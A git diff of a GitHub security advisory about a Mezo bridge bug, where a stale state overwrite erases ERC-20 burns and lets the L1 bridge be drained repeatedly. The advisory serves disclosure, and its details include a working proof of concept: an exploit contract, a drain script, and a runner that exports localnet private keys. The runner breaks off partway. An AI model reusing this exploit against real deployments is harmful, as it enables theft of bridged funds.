diff --git a/advisories/github-reviewed/2026/05/GHSA-6447-269v-g68m/GHSA-6447-269v-g68m.json b/advisories/github-reviewed/2026/05/GHSA-6447-269v-g68m/GHSA-6447-269v-g68m.json index b5833eb94010..8024e70e383d 100644 --- a/advisories/github-reviewed/2026/05/GHSA-6447-269v-g68m/GHSA-6447-269v-g68m.json +++ b/advisories/github-reviewed/2026/05/GHSA-6447-269v-g68m/GHSA-6447-269v-g68m.json @@ -1,17 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-6447-269v-g68m", - "modified": "2026-05-06T19:57:36Z", + "modified": "2026-05-06T19:57:37Z", "published": "2026-05-06T19:57:36Z", "aliases": [], "summary": "Mezo: ERC-20 bridgeOut burn can be erased by a stale StateDB overwrite leading to full L1 bridge drain", "details": "**Note: the fixed version of the validator client has been deployed for some time.**\n\n### Impact\n\nPotential full drain of L1 bridge without changing bridged balance on Mezo.\n\n## Brief/Intro\n\nA malicious user can steal all ERC-20 tokens locked in the L1 bridge by repeatedly calling the `bridgeOut` precompile from a crafted contract. The precompile's ERC-20 burn executes in an **inner StateDB** that commits to a cache context, but the **outer StateDB** still holds stale pre-burn storage slots in its `dirtyStorage`. When the outer transaction commits, it overwrites the inner burn with stale values -- **restoring the attacker's balance and allowance** while the `AssetsUnlocked` event has already been persisted to the bridge store. The Ethereum sidecar observes this event and attests the unlock on L1, releasing real tokens to the attacker. The attacker keeps their Mezo balance intact and can repeat the drain every block.\n\n## Vulnerability Details\n\nMezo's EVM uses a dual-context state architecture for precompile calls. When a precompile is invoked, `Contract.Run()` calls `stateDB.CacheContext()` which creates a `cachedCtx` branched from the base `ctx`. Cosmos-side state changes (like ERC-20 burns) happen on `cachedCtx`, while standard EVM storage operations (SLOAD/SSTORE) operate on the outer StateDB's `dirtyStorage` backed by `baseCtx`.\n\nThe `bridgeOut` precompile handles two token types with fundamentally different mechanisms:\n\n- **BTC (`burnBitcoin`)**: Burns via `x/bank` (Cosmos native), then explicitly records a `journal.SubBalance` entry. `syncJournalEntries()` propagates this to the outer StateDB, keeping both contexts in sync.\n- **ERC-20 (`burnERC20`)**: Burns via `ExecuteContractCall`, which creates an **entirely new inner StateDB** operating on `cachedCtx`. This inner StateDB executes `burnFrom` (decreasing balance, supply, and allowance slots), commits its changes to `cachedCtx`, and is discarded. **No journal entry is created.** The outer StateDB is never informed of these storage changes.\n\nThis creates a critical asymmetry. After `burnERC20` returns, the outer StateDB's `dirtyStorage` still contains the **pre-burn allowance** (written by `approve` earlier in the same transaction), and has **never loaded** the balance or supply slots. When the attacker triggers a subsequent `transfer(sink, 1)` in the same transaction, the outer StateDB performs a `GetCommittedState` on the balance slot. This reads from `baseCtx` -- which holds the **stale pre-burn value** because `cachedCtx` changes haven't been flushed to `baseCtx` yet. The stale balance minus 1 is written to `dirtyStorage`.\n\nAt end-of-transaction, `StateDB.Commit()` executes in this order:\n\n```go\nfunc (s *StateDB) Commit() error {\n if s.flushCache != nil {\n s.flushCache() // Step 1: flush cachedCtx → baseCtx (inner burn lands)\n }\n return s.commit(s.ctx) // Step 2: write dirtyStorage → baseCtx (stale values overwrite)\n}\n```\n\nStep 1 flushes the inner burn into `baseCtx`. Step 2 then iterates every slot in `dirtyStorage` and calls `keeper.SetState` on `baseCtx` -- **unconditionally**, without comparing against current values:\n\n```go\nfunc (s *StateDB) commit(ctx sdk.Context) error {\n for _, addr := range s.journal.sortedDirties() {\n obj := s.stateObjects[addr]\n // ...\n for _, key := range obj.dirtyStorage.SortedKeys() {\n s.keeper.SetState(ctx, obj.Address(), key, obj.dirtyStorage[key].Bytes())\n }\n }\n return nil\n}\n```\n\nThe stale allowance slot in `dirtyStorage` (from the `approve` before `bridgeOut`) overwrites the zeroed-out allowance that the inner burn wrote. The stale balance slot (from the `transfer` after `bridgeOut`) overwrites the zeroed-out balance. **The burn is erased.**\n\nMeanwhile, `SaveAssetsUnlocked` was called on `cachedCtx` during the precompile execution, persisting the `AssetsUnlockedEvent` to the bridge module's KV store. This event is flushed to `baseCtx` at Step 1 and survives Step 2 (different KV store prefix, not touched by `dirtyStorage`). The Ethereum sidecar observes this event and calls `AttestBridgeOut` on the L1 `MezoBridge` contract, releasing real tokens to the attacker's L1 address.\n\nThe attack is **repeatable per-block**. Each execution costs only 1 wei (the `transfer` trigger) while draining the full `bridgeOut` amount from L1. There is no supply assertion for ERC-20 tokens (only `abtc` is checked in `verifyBTCSupply`), so no end-of-block invariant catches the mismatch.\n\n## Impact Details\nCRITICAL - Using a fixed balance of e.g., 10,000 USDC on mezo an attacker can completly drain the USDC balance on ETH mainnet bridge via repeated exploit transactions on mezo.\n\n\nThe Mezo bridge on L1 (0xF6680EA3b480cA2b72D96ea13cCAF2cFd8e6908c) holds approximatively ~1,753,958.4 USD worth of assets that can be stolen, taking into account offramp limit safeguard. Below are the details of asset that can be drained:\n\n- cbBTC (mcbBTC: 0x6a7CD8E1384d49f502b4A4CE9aC9eb320835c5d7):\n\nlimit: 900000000 (9 cbBTC)\ndecimals: 8\nL1 bridge balance: 25.01605546 cbBTC\nVALUE AT RISK: (9 cbBTC) 633,190.53 USD\n\n- T (mT: 0xaaC423eDC4E3ee9ef81517e8093d52737165b71F):\n\nlimit: 60000000000000000000000000 (60,000,000 T)\ndecimals: 18\nL1 bridge balance: 426,294,138.843419368493748432 T\nVALUE AT RISK: (60,000,000 T) 397,537.57 USD AT RISK\n\n- USDC (mUSDC: 0x04671C72Aab5AC02A03c1098314b1BB6B560c197):\n\nlimit: 10000000000000 (10,000,000 USDC)\ndecimals: 6\nL1 bridge balance: 508,549.393027 USDC\nVALUE AT RISK: 508,549.39 USDC AT RISK\n\n- USDT (mUSDT: 0xeB5a5d39dE4Ea42C2Aa6A57EcA2894376683bB8E):\n\nlimit: 10000000000000 (10,000,000 USDT)\ndecimals: 6\nL1 bridge balance: 85,247.963024 USDT\nVALUE AT RISK: 85,247.96 USDT\n\n- xSolvBTC (mxSolvBTC: 0xdF708431162Ba247dDaE362D2c919e0fbAfcf9DE)\n\nlimit: 90000000000000000000 (90 xSolvBTC)\ndecimals: 18\nL1 bridge balance: 1.103740676354553591 xSolvBTC\nVALUE AT RISK: 1.10374068 xSolvBTC (76,765.16 USD)\n\n- SolvBTC (msolvBTC: 0xa10aD2570ea7b93d19fDae6Bd7189fF4929Bc747)\n\nlimit 90000000000000000000 (90 solvBTC)\ndecimals: 18\nL1 bridge balance: 0.496396263084933802 SolvBTC\nVALUE AT RISK: 0.49639626 solvBTC (34,920.48 USD)\n\n- FunctionBTC (mFBTC: 0x812fcC0Bb8C207Fd8D6165a7a1173037F43B2dB8)\n\nlimit: 900000000 (9 FBTC)\ndecimals: 8\nL1 bridge balance: 0.18064148 FBTC\nVALUE AT RISK: 0.18064148 FBTC (12,741.73 USD)\n\n- USDe (mUSDe: 0xdf6542260a9F768f07030E4895083F804241F4C4)\n\nlimit: 1000000000000000000000000 (1,000,000.00 USDe)\ndecimals: 18\nL1 bridge balance: 4,123.909662607937020208 USDe\nVALUE AT RISK: 4,123.20 USDe\n\n- swBTC (mswBTC: 0x29fA8F46CBB9562b87773c8f50a7F9F27178261c)\n\nlimit: 900000000 (9 swBTC)\ndecimals: 8\nL1 bridge balance: 0.02709065 swBTC\nVALUE AT RISK: 0.02709065 (2,904.74 USD)\n\n- DAI (mDAI: 0x1531b6e3d51BF80f634957dF81A990B92dA4b154)\n\nlimit: 1000000000000000000000000 (1,000,000.00 DAI)\ndecimals: 18\nL1 bridge balance: 882.421484670245389691 DAI\nVALUE AT RISK: 882.38 DAI\n\n**Total assets currently at risk taking into consideration limits per ERC20 token and available drainable balance on the bridge: 1,753,958.4 USD of assets on L1.**\n\n\n\n## References\n\n- `x/evm/statedb/statedb.go:677-684` -- `Commit()` flushes cache context then writes `dirtyStorage`, allowing stale outer slots to overwrite inner burn results. -> https://github.com/mezo-org/mezod/blob/17af5fdf29a6884d52e5ba6a1ee788c1f6e2a5ab/x/evm/statedb/statedb.go#L677-L684\n- `x/evm/statedb/statedb.go:655-674` -- `commit()` writes every `dirtyStorage` entry to the KV store unconditionally, without checking if the value has been superseded by the inner context flush. -> https://github.com/mezo-org/mezod/blob/17af5fdf29a6884d52e5ba6a1ee788c1f6e2a5ab/x/evm/statedb/statedb.go#L655-L674\n- `x/evm/statedb/state_object.go:236-244` -- `GetCommittedState()` reads from `s.db.ctx` (the base context), returning stale pre-burn values for slots not yet flushed from `cachedCtx`. -> https://github.com/mezo-org/mezod/blob/17af5fdf29a6884d52e5ba6a1ee788c1f6e2a5ab/x/evm/statedb/state_object.go#L236-L244\n- `precompile/contract.go:228` -- `CommitCacheContext()` writes draft storage to `cachedCtx` before precompile execution, but does not invalidate the outer StateDB's `dirtyStorage` or `originStorage`. -> https://github.com/mezo-org/mezod/blob/17af5fdf29a6884d52e5ba6a1ee788c1f6e2a5ab/precompile/contract.go#L228\n- `precompile/contract.go:254-265` -- `syncJournalEntries()` only processes `SubBalance`/`AddBalance` entries, which `burnBitcoin` uses but `burnERC20` does not, creating the BTC/ERC-20 asymmetry. -> https://github.com/mezo-org/mezod/blob/17af5fdf29a6884d52e5ba6a1ee788c1f6e2a5ab/precompile/contract.go#L254-L265\n- `precompile/assetsbridge/bridge_out.go:141-152` -- `burnERC20()` delegates to `ExecuteContractCall` without creating any journal entry, making the burn invisible to the outer StateDB. -> https://github.com/mezo-org/mezod/blob/17af5fdf29a6884d52e5ba6a1ee788c1f6e2a5ab/precompile/assetsbridge/bridge_out.go#L141-L152\n- `precompile/assetsbridge/bridge_out.go:221-222` -- `burnBitcoin()` explicitly creates a `journal.SubBalance` entry, the mechanism absent from `burnERC20`. -> https://github.com/mezo-org/mezod/blob/17af5fdf29a6884d52e5ba6a1ee788c1f6e2a5ab/precompile/assetsbridge/bridge_out.go#L221-L222\n- `x/evm/keeper/call.go:19-62` -- `ExecuteContractCall()` creates a new inner StateDB via `ApplyMessage(ctx, msg, tracer, true)`, where `true` means it commits the inner StateDB on completion. -> https://github.com/mezo-org/mezod/blob/17af5fdf29a6884d52e5ba6a1ee788c1f6e2a5ab/x/evm/keeper/call.go#L19-L62\n- `x/evm/keeper/state_transition.go:390` -- `ApplyMessageWithConfig` creates a fresh `statedb.New(ctx, k, txConfig)` using the passed context (`cachedCtx`), isolating the inner state from the outer StateDB. -> https://github.com/mezo-org/mezod/blob/17af5fdf29a6884d52e5ba6a1ee788c1f6e2a5ab/x/evm/keeper/state_transition.go#L390\n- `x/bridge/keeper/assets_unlocked.go:104-163` -- `SaveAssetsUnlocked()` persists the unlock event to the bridge KV store on `cachedCtx`, which survives the stale overwrite because it operates on a different store prefix. -> https://github.com/mezo-org/mezod/blob/17af5fdf29a6884d52e5ba6a1ee788c1f6e2a5ab/x/bridge/keeper/assets_unlocked.go#L104-L163\n\n## Fix\n\nThe root cause is that the outer StateDB's `dirtyStorage` is allowed to overwrite values that the inner StateDB (via `ExecuteContractCall`) has already committed to `cachedCtx`. Two complementary approaches:\n\n1. **Invalidate stale entries**: After `flushCache()` in `Commit()`, clear any `dirtyStorage` / `originStorage` entries that overlap with slots modified by the inner context. This prevents the blind overwrite in step 2.\n2. **Symmetric journal propagation**: Make `burnERC20` create journal entries (like `burnBitcoin` does) so that `syncJournalEntries()` reflects the balance and allowance changes in the outer StateDB. This removes the BTC/ERC-20 asymmetry entirely.\n\n\n## Proof-of-Concept/Exploit\nFor a realistic, mainnet-like reproduction we will poc the attack on 4 validator cluster in local network.\n\nVideo walkthrough -> https://mega.nz/file/rfYiEDoY#q53XXKdkBe8jIcOueAohbFHt9UkggTgKGIK41iEMSBA\n\n- git clone latest release of `mezod` repo (v7.0.0)\n```sh\ngit clone https://github.com/mezo-org/mezod.git\n```\n- clean any previous localnet and binary.\n```sh\n## clean previous localnet (if any)\nmake localnet-bin-clean\n```\n- build the binary and initialize the localnet.\n\n```sh\n## This creates .localnet/node{0,1,2,3}/ directories with keyring and config.\nmake localnet-bin-init\n```\n- Start each validator in separate terminals.\n\n```sh\nmake localnet-bin-start #then 0\nmake localnet-bin-start #then 1\nmake localnet-bin-start #then 2\nmake localnet-bin-start #then 3\n```\n\n- At this point wait atleast 5 blocks while monitoring the logs to see if the localnet is ready.\n\n- install solidity/hardhat deps (if first time):\n```sh\ncd solidity\nnpm install\ncd ..\n```\n- In `mezod/solidity/hardhat.config.ts` add the localnet in network code branch:\n\n```ts\n// networks: {\nlocalnet: {\n chainId: 31611,\n url: process.env.LOCALNET_RPC_URL || \"http://localhost:8545/\",\n accounts: parseCommaDelimitedString(process.env.LOCALNET_PRIVATE_KEY as string),\n },\n// }\n```\n\n- Create the `ExploitContract.sol` file in `solidity/contracts` path, and add the following contract:\n\n```sol\n// SPDX-License-Identifier: MIT\npragma solidity 0.8.29;\n\ninterface IERC20 {\n function approve(address spender, uint256 amount) external returns (bool);\n function transfer(address to, uint256 amount) external returns (bool);\n}\n\ninterface IAssetsBridge {\n function bridgeOut(\n address token,\n uint256 amount,\n uint8 chain,\n bytes calldata recipient\n ) external returns (bool);\n}\n\n/// @title ExploitContract\n/// @notice Exploits the dual-context stale-read overwrite in Mezo's EVM.\n/// Within a single tx: approve → bridgeOut (inner burn) → transfer\n/// (forces stale SLOAD). On commit, outer dirtyStorage overwrites the\n/// inner burn, restoring balance and allowance.\ncontract ExploitContract {\n address private constant BRIDGE =\n 0x7B7C000000000000000000000000000000000012;\n\n address public transferRecipient;\n\n constructor(address _transferRecipient) {\n transferRecipient = _transferRecipient;\n }\n\n function exploit(\n address token,\n uint256 amount,\n bytes calldata recipient\n ) external {\n IERC20 t = IERC20(token);\n\n // Outer stateDB writes allowance slot into dirtyStorage.\n t.approve(BRIDGE, amount);\n\n // Inner stateDB (via ExecuteContractCall) burns balance, supply,\n // allowance on cachedCtx. Outer stateDB still holds stale allowance\n // in dirtyStorage and has not loaded balance/supply.\n bool ok = IAssetsBridge(BRIDGE).bridgeOut(\n token, amount, 0, recipient\n );\n require(ok, \"bridgeOut failed\");\n\n // Forces outer stateDB to SLOAD balance from baseCtx (stale pre-burn\n // value), then SSTORE (staleBalance - 1) into dirtyStorage.\n // At commit, outer's dirtyStorage overwrites inner's burn.\n t.transfer(transferRecipient, 1);\n }\n}\n```\nI've put extensive explanation about the attack contract see comments\n\n- Create the `poc_exploit.ts` file in `solidity/scripts` path and paste the following scipt:\n\n```ts\n/**\n * PoC: ERC-20 BridgeOut Stale-Read Overwrite — Repeated Drain\n *\n * Demonstrates that an attacker with only 20,000 USDC can drain\n * 20,000 USDC from L1 five times (100,000 USDC total) because the\n * burn is erased after every exploit transaction.\n *\n * Reproduction (from repo root):\n * 1. make localnet-bin-clean && make localnet-bin-init\n * 2. Start all 4 nodes (make localnet-bin-start — select 0,1,2,3)\n * 3. cd solidity && npm install (first time only)\n * 4. bash scripts/run_poc.sh\n */\n\nimport { ethers, upgrades } from \"hardhat\";\n\nconst BRIDGE = \"0x7B7C000000000000000000000000000000000012\";\nconst BRIDGE_ABI = [\n \"function createERC20TokenMapping(address,address) external returns (bool)\",\n \"function setOutflowLimit(address,uint256) external returns (bool)\",\n \"function setMinBridgeOutAmount(address,uint256) external returns (bool)\",\n \"event AssetsUnlocked(uint256 indexed unlockSequenceNumber, bytes indexed recipient, address indexed token, address sender, uint256 amount, uint8 chain)\",\n];\n\nconst ROUNDS = 5;\nconst AMT = 20_000n * 10n ** 6n; // 20 K USDC per round\nconst SUPPLY = 508_549_320_673n; // production totalSupply (6 decimals)\nconst OUTFLOW = 10_000_000_000_000n; // production outflow limit\nconst MIN_OUT = 20_000_000n; // production min bridgeOut (20 USDC)\n\nfunction fmt(v: bigint): string {\n return (Number(v) / 1e6).toLocaleString(\"en-US\", { minimumFractionDigits: 2 });\n}\n\nasync function main() {\n const [deployer, attacker] = await ethers.getSigners();\n\n // 1. deploy mUSDC (+ real production values)\n console.log(\"\\n[1] Deploying mUSDC (production proxy) ...\");\n const mUSDC = await upgrades.deployProxy(\n await ethers.getContractFactory(\"mUSDC\", deployer),\n [\"Mezo USD Coin\", \"mUSDC\", 6, deployer.address],\n { kind: \"transparent\", initialOwner: deployer.address, redeployImplementation: \"always\" },\n );\n await mUSDC.waitForDeployment();\n await (await mUSDC.initializeV2()).wait();\n const token = await mUSDC.getAddress();\n console.log(\" token :\", token);\n\n // 2. node0 (only admin) register the mUSDC token with bridge\n console.log(\"\\n[2] Registering token with AssetsBridge precompile ...\");\n const SRC = ethers.getAddress(\n \"0x\" + ethers.keccak256(ethers.toUtf8Bytes(\"poc-usdc:\" + token)).slice(-40),\n );\n const bridge = new ethers.Contract(BRIDGE, BRIDGE_ABI, deployer);\n await (await bridge.createERC20TokenMapping(SRC, token)).wait();\n await (await bridge.setOutflowLimit(token, OUTFLOW)).wait();\n await (await bridge.setMinBridgeOutAmount(token, MIN_OUT)).wait();\n console.log(\" done\");\n\n // 3. mint supply & fund attacker with exactly 20,000 USDC\n console.log(\"\\n[3] Minting supply & funding attacker ...\");\n await (await mUSDC.mint(deployer.address, SUPPLY)).wait();\n await (await mUSDC.transfer(attacker.address, AMT)).wait();\n console.log(\" total supply :\", fmt(await mUSDC.totalSupply()), \"USDC\");\n console.log(\" attacker got :\", fmt(AMT), \"USDC\");\n\n // 4. deploy exploit contract & send the 20,000 USDC into it\n console.log(\"\\n[4] Deploying ExploitContract ...\");\n const exploit = await (\n await ethers.getContractFactory(\"ExploitContract\", attacker)\n ).deploy(attacker.address);\n await exploit.waitForDeployment();\n const exploitAddr = await exploit.getAddress();\n await (await mUSDC.connect(attacker).transfer(exploitAddr, AMT)).wait();\n console.log(\" contract :\", exploitAddr);\n console.log(\" funded :\", fmt(await mUSDC.balanceOf(exploitAddr)), \"USDC\");\n\n // 5. exploit loop — drain 20,000 USDC × 5 from L1 with only 20,000 USDC (could be less needed with same result but slower)\n const iface = new ethers.Interface(BRIDGE_ABI);\n let totalDrained = 0n;\n\n console.log(\"\\n══════════════════════════════════════════════════════\");\n console.log(\" Starting exploit: 20,000 USDC → drain 5 × 20,000 USDC from L1\");\n console.log(\"══════════════════════════════════════════════════════\");\n\n for (let i = 1; i <= ROUNDS; i++) {\n const bal = await mUSDC.balanceOf(exploitAddr);\n\n const tx = await exploit.connect(attacker).exploit(\n token, bal, \"0x\" + \"aa\".repeat(20), { gasLimit: 5_000_000 },\n );\n const rc = await tx.wait();\n\n let l1Amount = 0n;\n for (const log of rc!.logs) {\n try {\n const p = iface.parseLog({ topics: log.topics as string[], data: log.data });\n if (p?.name === \"AssetsUnlocked\") l1Amount = p.args.amount;\n } catch {}\n }\n // crucial check to ensure the attack is successful\n if (l1Amount === 0n) throw new Error(`Round ${i}: AssetsUnlocked event not found`);\n totalDrained += l1Amount;\n\n const balAfter = await mUSDC.balanceOf(exploitAddr);\n\n // BALANCE AFTER SHOULD HAVE BEEN 0\n console.log(\n `\\n Round ${i}/${ROUNDS}` +\n ` | bridged: ${fmt(l1Amount)} USDC` +\n ` | balance after: ${fmt(balAfter)} USDC (raw: ${balAfter})` +\n ` | total drained: ${fmt(totalDrained)} USDC`,\n );\n }\n\n // 6. final state\n const finalBal = await mUSDC.balanceOf(exploitAddr);\n const finalSup = await mUSDC.totalSupply();\n\n console.log(\"\\n── FINAL STATE ────────────────────────────────────\");\n console.log(\" balance remaining :\", fmt(finalBal), \"USDC\");\n console.log(\" totalSupply :\", fmt(finalSup), \"USDC\");\n\n console.log(\"\\n── Result of the exploit ────────────────────────────────────────\");\n console.log(\" Started with :\", fmt(AMT), \"USDC\");\n console.log(\" Drained from L1 :\", fmt(totalDrained), `USDC (${ROUNDS} rounds)`);\n console.log(\" Still holds :\", fmt(finalBal), \"USDC\");\n if (totalDrained > AMT) {\n console.log(`\\n Exploit successful`);\n console.log(` initially attacker had ${fmt(AMT)} USDC, extracted ${fmt(totalDrained)} USDC from L1`);\n } else {\n console.log(\"\\n Not triggered\");\n }\n}\n\nmain().then(() => process.exit(0)).catch((e) => { console.error(e); process.exit(1); });\n\n```\n- And create the `run_poc.sh` file in `solidity/scripts` path and paste the followin script:\n\n```sh\n#!/usr/bin/env bash\n# PoC runner — extracts localnet keys and runs the exploit.\n#\n# Usage (from repo root):\n# make localnet-bin-clean && make localnet-bin-init\n# # start all 4 nodes in separate terminals (make localnet-bin-start)\n# cd solidity && npm install # first time only\n# bash scripts/run_poc.sh\n\nset -euo pipefail\n\nROOT=\"$(cd \"$(dirname \"$0\")/../..\" && pwd)\"\nSOL=\"$ROOT/solidity\"\nMEZOD=\"$ROOT/build/mezod\"\n\ndie() { echo \"ERROR: $1\" >&2; exit 1; }\n\n[[ -x \"$MEZOD\" ]] || die \"mezod not found — run 'make build'\"\n[[ -d \"$ROOT/.localnet/node0/mezod\" ]] || die \"localnet not initialised — run 'make localnet-bin-init'\"\n\n# wait for RPC\necho \"[*] Waiting for JSON-RPC ...\"\nfor i in $(seq 1 10); do\n curl -sf http://localhost:8545/ -X POST -H \"Content-Type: application/json\" \\\n -d '{\"jsonrpc\":\"2.0\",\"method\":\"eth_blockNumber\",\"params\":[],\"id\":1}' \\\n >/dev/null 2>&1 && break\n [[ $i -eq 10 ]] && die \"JSON-RPC unreachable — start the 4 nodes first\"\n sleep 1\ndone\n\n# extract keys (stderr suppressed — only the hex key comes on stdout)\nkey0=$(echo y | \"$MEZOD\" keys export node0 --unsafe --unarmored-hex \\\n --home \"$ROOT/.localnet/node0/mezod\" --keyring-backend test 2>/dev/null \\\n | grep -oE '[0-9a-f]{64}' | head -1)\nkey1=$(echo y | \"$MEZOD\" keys export node1 --unsafe --unarmored-hex \\\n --home \"$ROOT/.localnet/node1/mezod\" --keyring-backend test 2>/dev/null \\\n | grep -oE '[0-9a-f]{64}' | head -1)\n\n[[ -n \"$key0\" && -n \"$key1\" ]] || die \"could not extract private keys\"\n\ncat > \"$SOL/.env\" <